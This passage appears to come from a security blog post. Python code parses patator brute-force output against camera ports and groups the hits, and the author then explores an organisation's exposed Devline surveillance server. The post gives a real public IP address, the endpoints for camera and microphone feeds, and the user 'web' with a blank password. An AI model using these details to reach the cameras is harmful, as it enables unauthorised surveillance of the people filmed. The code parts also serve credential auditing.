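SUMMARY_RE = re.compile(r'Hits/Done/Skip/Fail/Size:\s*(\d+)/(\d+)/(\d+)/(\d+)/(\d+)')

# The patator output from the article.
PATATOR_OUTPUT = """\
07:35:23 patator INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-03-19 07:35 MSK
07:35:23 patator INFO -
07:35:23 patator INFO - code size:clen time | candidate | num | mesg
07:35:23 patator INFO - -----------------------------------------------------------------------------
07:35:23 patator INFO - 200 2855:2727 0.242 | 9983 | 7 | HTTP/1.1 200 OK
07:35:23 patator INFO - 200 2855:2727 0.239 | 9984 | 8 | HTTP/1.1 200 OK
07:35:24 patator INFO - 200 2785:2657 0.250 | 9990 | 14 | HTTP/1.1 200 OK
07:35:24 patator INFO - 200 2785:2657 0.227 | 9991 | 15 | HTTP/1.1 200 OK
07:35:24 patator INFO - 200 2785:2657 0.227 | 9992 | 16 | HTTP/1.1 200 OK
07:35:24 patator INFO - 200 2593:2378 0.233 | 9993 | 17 | HTTP/1.1 200 OK
07:35:24 patator INFO - 200 2591:2378 0.232 | 9994 | 18 | HTTP/1.1 200 OK
07:35:24 patator INFO - 200 2593:2378 0.232 | 9995 | 19 | HTTP/1.1 200 OK
07:35:24 patator INFO - 200 2785:2657 0.235 | 9997 | 21 | HTTP/1.1 200 OK
07:35:24 patator INFO - 200 2593:2378 0.239 | 9998 | 22 | HTTP/1.1 200 OK
07:35:25 patator INFO - Hits/Done/Skip/Fail/Size: 10/22/0/0/22, Avg: 10 r/s, Time: 0h 0m 2s
"""


def parse_patator(text):
    """Return (rows, summary): result rows as dicts and the final counters, if present."""
    rows, summary = [], None
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            rows.append({
                "code": int(m["code"]), "size": int(m["size"]), "clen": int(m["clen"]),
                "time": float(m["time"]), "candidate": m["candidate"].strip(),
                "num": int(m["num"]), "mesg": m["mesg"].strip(),
            })
            continue
        s = SUMMARY_RE.search(line)
        if s:
            summary = dict(zip(("hits", "done", "skip", "fail", "size"), map(int, s.groups())))
    return rows, summary


def hits(rows, ok_codes=(200,)):
    """Candidates (here: ports) for which the server answered with a success code."""
    return [r["candidate"] for r in rows if r["code"] in ok_codes]


def cluster_by_response(rows, ok_codes=(200,)):
    """Group successful candidates by (size, clen). Identical sizes usually mean the
    same device model and firmware serving the same page, i.e. one shared default
    that has to be changed on every member of the group."""
    groups = defaultdict(list)
    for r in rows:
        if r["code"] in ok_codes:
            groups[(r["size"], r["clen"])].append(r["candidate"])
    return dict(groups)


if __name__ == "__main__":
    rows, summary = parse_patator(PATATOR_OUTPUT)
    print("hits:", hits(rows), "summary:", summary)
    for sig, members in cluster_by_response(rows).items():
        print("signature %s:%s ->" % sig, members)
```

On this output the clustering gives four signatures (two, four, three and one ports), so the ten "hits" are most likely four device types that were all provisioned with the same password; on your own fleet that grouping is the work list for rotating credentials and for moving the devices off the public interface altogether.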
By inertia, almost reflexively, I began to strip the ports.txt file of the ports of those hosts whose passwords are already known, in order to start a dictionary brute force against the remaining 12 ports, but then I reminded myself that we were only going to look at who this is. And I did not do that. Besides, there is no need to see the video from all the IP cameras of this organization…
How to open Devline Linia Server (Devline) without Flash
There were some problems with http://193.232.100.234:9786/: I couldn’t find a web browser that still supports Flash (I run Linux). I thought of starting a virtual machine with Windows and opened this address in Internet Explorer; this is what Devline Linia Server (Devline) looks like:
You may ask what password you need to enter: you do not need to enter a password… Just open the address and look… Perhaps it was intended…
The user is web, the password is <blank>. To make it easier for the boss to remember?
IT department: perhaps the DoS attack was carried out from here…
Since Flash is a rather ancient technology, there is a chance that the Flash application is quite simple and access to the cameras can be obtained without Internet Explorer. You can decompile the Flash file, but, in my opinion, it is even easier to understand how it works by analysing its network activity.
Analysis of Flash application network activity
Probably not everyone even knows what Flash is any more. It is a powerful technology that greatly expanded the capabilities of web browsers in the past and was very popular. Now, due to the lack of browser support, it is almost forgotten. So, quite briefly, about analysing Flash applications in Wireshark.
Since Flash works inside the browser, this application sends ordinary HTTP requests. For analysis it is enough to capture the traffic and apply the filter in Wireshark:
http
By the way, see "Wireshark Filters".
There, everything turned out to be trivially simple: requests are made to addresses of the form:
- http://193.232.100.234:9786/cameras
- http://193.232.100.234:9786/microphones
- http://193.232.100.234:9786/users/web
Basic authentication is used there.
The returned XML document contains relative links to videos and photos, for example, http://193.232.100.234:9786/cameras/2/video, http://193.232.100.234:9786/cameras/23/video, and so on.
Why Flash here, if everything could be done with JavaScript and HTML5? Apparently, the front-end was written about fifteen years ago and the developer who wrote it quit, and now nobody can redo it… The Devline company itself, judging from the price list on its official website, is alive.
Conclusion
And, perhaps, that is enough about them. Why did one of the factory employees run a DoS attack against my website? I do not know. Apparently, he has too much free time at work.
The surveillance cameras were either deliberately gathered in a hub and exposed for open access, or configured in a really quite deliberately wrong way: not only is no password needed, you do not even need to enter a username to view them. Perhaps this was done so that everyone can see what a perfect factory exists…
Well, in this article we learned how to find and identify services even when they run on unusual ports. We learned how to work with Router Scan by Stas'M and patator on non-standard ports. And we looked at the analysis of the network activity of a very simple application.
Hi Alex,
https://miloserdov.org/?p=2287 is not accessible